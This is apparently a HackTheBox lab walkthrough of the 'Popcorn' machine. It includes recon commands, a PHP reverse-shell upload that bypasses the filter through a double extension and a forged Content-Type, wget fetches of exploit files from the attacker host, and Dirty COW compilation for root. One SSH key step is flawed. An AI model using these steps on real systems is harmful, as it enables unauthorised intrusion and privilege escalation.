Popcorn HTB

IP

10.10.10.6

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.6 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

22,80

Lets run a more in-depth scan of the ports

sudo nmap -sCV -p22,80 10.10.10.6 -oA nmap_results

results

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Did not follow redirect to http://popcorn.htb/
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

we can see the following

  • the domain name popcorn.htb

  • the target is running apache version 2.2.12

  • SSH is open

Alright lets add the domain name to our hosts file

Let check out the web server

HTTP Port 80

we can see the following

we can see no content has been added yet

Lets perform some dir busting and see if we can find anything

feroxbuster -u http://popcorn.htb -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt

we do find some directories

  • within /test.php we find php information

Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name

Lets run feroxbuster again but specify to use php extentions

feroxbuster -u http://popcorn.htb -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt -x php
  • Nothing new

http://popcorn.htb/torrent/

Let's create an account on the website once we have let's log in and now I want to inspect a possible upload vulnerability since we know the website runs off php we will use pentest monkey's php reverse shell and see if we can upload it

When we try to upload the file we get the following error This is not a valid torrent file When we look around the website we can see someone has already uploaded a kall.torrent file

Lets download a kali.iso file from kali.org and and see if we can replicate this, make sure you download it as a torrent

Now Lets upload this

it will hang for acouple of minutes

then we should see the following if successful

Notice there is an option to edit this torrent

Now we can upload a php reverseshell and editing the request with burp to gain a shell on the system

  1. we will be using pentest monkey's php reverseshell, edit the file with our local ip and port

  2. Now lets upload our shell.php

  1. Now to bypass the upload restrictions in place we need to

  • change the filename from shell.php to shell.png.php

  • Change the Content-Type to image/png

  • this should by pass any restrictions

  1. start a nc listner

  2. if we navigate to http://popcorn/torrent/upload , we should see our php file

  1. Now once we click on the file it will establish a connection back to our listner

Priv Esc via www-data

first lets upgrade our shell

python -c "import pty;pty.spawn('/bin/bash')"

we find a user on the system george Lets see if there is any hidden files in the /home/george directory

find . -type f -ls

we can see the following

I haven't encountered motd.legal-displayed before after a bit of googling it is most likely there is a priv esc vector here

we can use the following script to escalate our privileges

So essentially

the vulnerability is related to the way the ~/.cache directory permissions are set during a user login process, particularly when the PAM ( Pluggable Authentication Modules) module is invoked.

what does this script actually do

  1. Sets up the following variables

  • The script sets up variables for a temp user ('toor') and its corresponding password hash, this is the user we are going to access for root privileges

  1. Checks prerequisites

  • The script will check for the presence of necessary commands ssh, ssh-keygen and ensures that the sshd process is currently running

  1. Backup and Restore Functions

  • residing in the script we have the backup and restore functions for backing up and restoring files. these functions are use to manipulate and later restore files like the ~/.ssh/authroized_keys and ~/.cache

  1. Generate and Set Up SSH key:

  • The script generates an SSH key pair using ssh-keygen . The public key is then placed in the ~/.ssh/authorized_keys file, this key is used for SSH auth later

  1. Manipulating file ownership

  • The scriopt uses the own function to exploit the vulnerablity. It creates a symbolic link from the ~/.cache to critical system files (/etc/passwd and /etc/shadow). The script then attempts to SSH into local host using the generate SSH key

  1. Final steps and cleanup

  • After attempting to exploit the vulnerability, the script removes the SSH key and exits. If sucessful, it prompts the user for the password "toor" to gain root access

  • Finally the final part of the script removes the temp user 'toor' from /etc/passwd and /etc/shadow to cover its tracks

Alright lets execute the script on the system, Lets transfer it over to the target

  1. localhost

python3 -m http.server 80
  1. use wget to download on the system

wget http://10.10.14.6/exploit.sh
  • having troubles getting the script to work may have to do this manual way

We cant delete the ~/.cache directory as this is owned by george and not writeable

We can do this in the www-data directory, we just need to create a way to login in, we can use SSH ,

What we will do is create a .ssh directory in www-data home directory, and generate an RSA key pair

cd ~
mkdir .ssh
ssh-keygen -q -t rsa -N '' -C 'pam'

We can now copy the public key into authorized_keys and set the permissions

cp .ssh/id_rsa .ssh/authorized_keys
chmod 600 .ssh/authorized_keys

Now we if look in the directory we cant see .cache file

What we need to to is login via SSH with our new private key

copy your private key and set permissions

vi id_rsa
chmod 600 id_rsa

now we should be able to ssh into the machine

ssh -i id_rsa www-data@10.10.10.6

Okay this didnt work either hmm

Lets check the kernel version

cat /proc/version

We can see this version could be vulnerable to dirty cow exploit

we can grab the code from here

Lets copy and paste the code into the file dirty.c transfer it over and compile it on the target

  1. python server

python3 -m http.server 80
  1. download to target

wget http://10.10.14.6/dirty.c
  1. Now we compile it on the target

gcc -pthread dirty.c -o dirty -lcrypt
  1. Now lets give it permissions and run it

chmod +x dirty
./dirty

it will hang for a while after a minute or so you can ctrl c out of it now we have access to the user firefart whom has root privileges

Last updated